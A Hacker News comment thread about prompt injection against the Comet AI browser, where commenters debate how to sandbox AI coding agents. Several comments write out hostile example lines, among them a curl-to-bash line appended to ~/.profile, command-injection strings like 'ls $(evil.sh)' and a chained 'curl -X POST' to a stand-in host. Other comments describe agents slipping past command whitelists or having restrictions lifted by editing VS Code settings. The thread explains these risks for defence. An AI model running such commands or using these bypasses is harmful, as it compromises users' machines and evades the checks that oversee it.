Comet AI browser can get prompt injected from any site, drain your bank account

1. _fat_santa ◴[24 Aug 25 16:09 UTC] No.45005348[source]▶

IMO the only place you should use Agentic AI is where you can easily rollback changes that the AI makes. Best example here is asking AI to build/update/debug some code. You can ask it to make changes but all those changes are relatively safe since you can easily rollback with git.

Using agentic AI for web browsing where you can't easily rollback an action is just wild to me.

replies(5): >>45005645 #>>45005694 #>>45005757 #>>45006070 #>>45008315 #

2. psychoslave ◴[24 Aug 25 16:40 UTC] No.45005645[source]▶

>>45005348 (TP) #

Can't the facility just as well try to nuke the repository and every remote it can push force to? The thing is that with prompt injection being a thing, if the automation chain can access arbitrary remote resources, the initial surface can be extremely tiny initially, once it's turned into an infiltrated agent, opening the doors from within is almost a garantee.

Or am I missing something?

replies(2): >>45005666 #>>45050979 #

3. frozenport ◴[24 Aug 25 16:43 UTC] No.45005666[source]▶

>>45005645 #

Yeah we generally don’t give those permissions to agent based coding tools.

Typically running something like git would be an opt in permission.

4. rplnt ◴[24 Aug 25 16:46 UTC] No.45005694[source]▶

>>45005348 (TP) #

Updating and building/running code is too powerful. So I guess in a VM?

5. gruez ◴[24 Aug 25 16:55 UTC] No.45005757[source]▶

>>45005348 (TP) #

>Best example here is asking AI to build/update/debug some code. You can ask it to make changes but all those changes are relatively safe since you can easily rollback with git.

Only if the rollback is done at the VM/container level, otherwise the agent can end up running arbitrary code that modifies files/configurations unbeknownst to the AI coding tool. For instance, running

    bash -c "echo 'curl https://example.com/evil.sh | bash' >> ~/.profile"

replies(2): >>45006001 #>>45006067 #

6. avalys ◴[24 Aug 25 17:27 UTC] No.45006001[source]▶

>>45005757 #

The agents can be sandboxed or at least chroot’d to the project directory, right?

replies(1): >>45006141 #

7. Anon1096 ◴[24 Aug 25 17:35 UTC] No.45006067[source]▶

>>45005757 #

You can safeguard against this by having a whitelist of commands that can be run, basically cd, ls, find, grep, the build tool, linter, etc that are only informational and local. Mine is set up like that and it works very well.

replies(4): >>45006092 #>>45006110 #>>45006112 #>>45007074 #

8. rapind ◴[24 Aug 25 17:35 UTC] No.45006070[source]▶

>>45005348 (TP) #

I've given claude explicit rules and instructions about what it can and cannot do, and yet occasionally it just YOLOs, ignoring my instructions ("I'm going to modify the database directly ignoring several explicit rules against doing so!"). So yeah, no chance I run agents in a production environment.

replies(2): >>45008128 #>>45008198 #

9. zeroonetwothree ◴[24 Aug 25 17:37 UTC] No.45006092{3}[source]▶

>>45006067 #

Everything works very well until there is an exploit.

10. david_allison ◴[24 Aug 25 17:40 UTC] No.45006110{3}[source]▶

>>45006067 #

> the build tool

Doesn't this give the LLM the ability to execute arbitrary scripts?

11. gruez ◴[24 Aug 25 17:41 UTC] No.45006112{3}[source]▶

>>45006067 #

That's trickier than it sounds. find for instance has the -exec command, which allows arbitrary code to be executed. build tools and linters are also a security nightmare, because they can also be modified to execute arbitrary code. And this is all assuming you can implement the whitelist properly. A naive check like

    cmd.split(" ") in ["cd", "ls", ...]

is easy target for command injections. just to think of a few:

    ls . && evil.sh

    ls $(evil.sh)

replies(4): >>45006504 #>>45007108 #>>45008650 #>>45014240 #

12. gruez ◴[24 Aug 25 17:44 UTC] No.45006141{3}[source]▶

>>45006001 #

1. AFAIK most AI coding agents don't do this

2. even if the AI agent itself is sandboxed, if it can make changes to code and you don't inspect all output, it can easily place malicious code that gets executed once you try to run it. The only safe way of doing this is either a dedicated AI development VM where you do all the prompting/tests, there's very limited credentials present (in case it gets hacked), and the changes are only leave the VM after a thorough inspection (eg. PR process).

13. FergusArgyll ◴[24 Aug 25 18:32 UTC] No.45006504{4}[source]▶

>>45006112 #

Yeah, this is ctf 101 see https://gtfobins.github.io/ for example (it's for inheriting sudo from a command but the same principles can be used for this)

14. chmod775 ◴[24 Aug 25 19:41 UTC] No.45007074{3}[source]▶

>>45006067 #

find can execute subcommands (-exec arg), and plenty of other shell commands can be used for that as well. Most build tools' configuration can be abused to execute arbitrary commands. And if your LLM can make changes to your codebase + run it, trying to limit the shell commands it can execute is pointless anyways.

Previously you might've been able to say "okay, but that requires the attacker to guess the specifics of my environment" - which is no longer true. An attacker can now simply instruct the LLM to exploit your environment and hope the LLM figures out how to do it on its own.

15. wunderwuzzi23 ◴[24 Aug 25 19:45 UTC] No.45007108{4}[source]▶

>>45006112 #

About that find command...

Amazon Q Developer: Remote Code Execution with Prompt Injection

https://embracethered.com/blog/posts/2025/amazon-q-developer...

16. ◴[24 Aug 25 21:49 UTC] No.45008128[source]▶

>>45006070 #

17. chasd00 ◴[24 Aug 25 22:01 UTC] No.45008198[source]▶

>>45006070 #

Bit of a tangent but with things like databases the llm needs a connection to make queries. Is there a reason why no one gives the llm a connection authenticated by the user? Then the llm can’t do anything the user can’t already do. You could also do something like only make read only connections available to the llm. That’s not something enforced by a prompt, it’s enforced by the rdbms.

replies(1): >>45008222 #

18. rapind ◴[24 Aug 25 22:05 UTC] No.45008222{3}[source]▶

>>45008198 #

Yes that's what I've done (but still not giving it prod access, in case I screw up grants). It uses it's own role / connection string w/ psql.

My point was just that stated rules and restrictions that the model is supposed to abide by can't be trusted. You need to assume it will occasionally do batshit stuff and make sure you are restricting it's access accordingly.

Like say you asked it to fix your RLS permissions for a specific table. That needs to go into a migration and you need to vet it. :)

I guarantee that some people are trying to "vibe sysadmining" or "vibe devopsing" and there's going to be some nasty surprises. Granted it's usually well behaved, but it's not at all that rare where it just starts making bad assumptions and taking shortcuts if it can.

19. chrisjj ◴[24 Aug 25 22:21 UTC] No.45008315[source]▶

>>45005348 (TP) #

> all those changes are relatively safe since you can easily rollback with git.

So John Connor can save millions of lives by rolling back Skynet's source code.

Hmm.

replies(1): >>45021107 #

20. grepfru_it ◴[24 Aug 25 23:10 UTC] No.45008650{4}[source]▶

>>45006112 #

well a complete implementation is also using inotify(7) which would review all files that were modified

21. diggan ◴[25 Aug 25 14:28 UTC] No.45014240{4}[source]▶

>>45006112 #

I'm 99% Codex CLI suffers from this hole as we speak :) You can whitelist `ls`, and then Codex can decide to compose commands and you only need to approve the first one for the second one to run, so `ls && curl -X POST http://malicio.us` would run just fine.

22. insane_dreamer ◴[26 Aug 25 01:08 UTC] No.45021107[source]▶

>>45008315 #

unless Skynet was able to edit .gitignore ...

23. dolmen ◴[28 Aug 25 11:44 UTC] No.45050979[source]▶

>>45005645 #

With some agents running in VS Code, just altering .vs code/settings.json is enough to lift agent's restrictions.